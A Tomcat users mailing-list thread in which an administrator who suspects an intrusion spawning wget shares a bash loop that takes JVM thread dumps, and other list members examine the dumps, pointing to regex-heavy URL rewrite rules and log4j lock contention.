> Subject: Re: Regarding i think an intrusion
> From: lsantagost...@gmail.com
> To: users@tomcat.apache.org
>
> Hello Chris, but this logfile was only one day.
MG>Ay Caramba!
>
> Maybe i had a concept mismatch trying to capture the exact moment when the
> execution begins.
>
> My command was
>
> while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
> "127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep
> java | grep -v grep | awk '{ print $2 }'); echo -e "Se encontro wget
> corriendo, sacando dump de JVM..." ; kill -3 $PIDJAVA; fi; sleep 3; done
>
> Maybe too many dumps all togheter, now im trying to get a "live" capture
> without luck =(
>
> If you know a better method, please letme know it.
>
> Thanks for your effort, knid regards,
> Leonardo
>
> Saludos.-
> Leonardo Santagostini
MG>Tomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita utilizar JDK
@ 1.7 (ahora)
MG>esto
"ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10
tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
java.lang.Thread.State: TIMED_WAITING (sleeping)
at java.lang.Thread.sleep(Native Method)
at
org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
at java.lang.Thread.run(Thread.java:662)
MG>Estos registros informativos producen MUCHO ruido
MG>log4j.properties
MG>log4j.logger.org.quartz=OFF //(Callate Quartz)
MG>eso
"ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656
runnable [0x0000000046f34000]
java.lang.Thread.State: RUNNABLE
at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
MG>DEMASIADO!
MG>necesita cambiar match-type desde regex at wildcard en Tuckey
.\WEB-INF\urlrewrite.xml...por ejemplo
<!-- regex no es necessario -->
<!-- rule match-type="regex">
<name>BasicRule</name>
<from>basicfrom</from>
<to>basicto</to>
</rule -->
<rule match-type="wildcard">
<name>BasicRule</name>
<from>basicfrom</from>
<to>basicto</to>
</rule>
MG>puedes ver que nombre, desde y a son los mismos
MG>Cada vez que veas 'Runnable' y 'locked' (por ejemplo)
"http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d waiting
on condition [0x000000004ad9b000]
java.lang.Thread.State: RUNNABLE
at java.util.Vector.addElement(Vector.java:572)
- locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
- locked <0x00000006e0303d80> (a java.util.Hashtable)
MG>necessita mata el proceso o cambia proceso lento ...(log4j updateParents)
por ejemplo en log4j
package org.apache.log4j;
public class Hierarchy implements org.apache.log4j.spi.LoggerFactory,
org.apache.log4j.spi.RendererSupport{
private org.apache.log4j.spi.LoggerFactory defaultFactory;
private java.util.Vector listeners;
// Hashtable ht;
java.util.ConcurrentHashMap<String,ProvisionNode> ht=new
java.util.ConcurrentHashMap<String,ProvisionNode>();
//mucho mas tarde
public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory
factory) {
{
....
} else if (o instanceof org.apache.log4j.ProvisionNode) {
//System.out.println("("+name+") ht.get(this) returned ProvisionNode");
logger = factory.makeNewLoggerInstance(name);
logger.setHierarchy(this);
ht.put(key, logger);
updateChildren((ProvisionNode) o, logger);
updateParents(logger);
return logger;
}
http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
MG>Entiendes?
MG>Martín
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-05-05 13:06 GMT-03:00 Christopher Schultz <ch...@christopherschultz.net
> >:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA256
> >
> > Leonardo,
> >
> > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> > > Ok, again its uploaded.
> > >
> > > This is the link
> > >
> > >
> > https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
> >
> > 1/2
> > >
> > GiB log file? Hrm.
> >
> > It doesn't even have any calls to Runtime.exec in it. If you have a
> > snapshot of a thread dump (and only the thread dump, I don't need 3
> > weeks of your logs) that you took while the "intrusion" was taking
> > place, post that.
> >
> > If you don't, then I think you're out of luck.
> >
> > Sounds like a bad time to go on holiday.
> >
> > - -chris
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1
> > Comment: GPGTools - http://gpgtools.org
> > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
> >
> > iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
> > Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
> > TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
> > IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
> > mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
> > Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
> > az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
> > Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
> > kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
> > tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
> > 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
> > EcwrNcX2iZ+JXXtSTnzH
> > =nxGK
> > -----END PGP SIGNATURE-----
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> > For additional commands, e-mail: users-h...@tomcat.apache.org
> >
> >
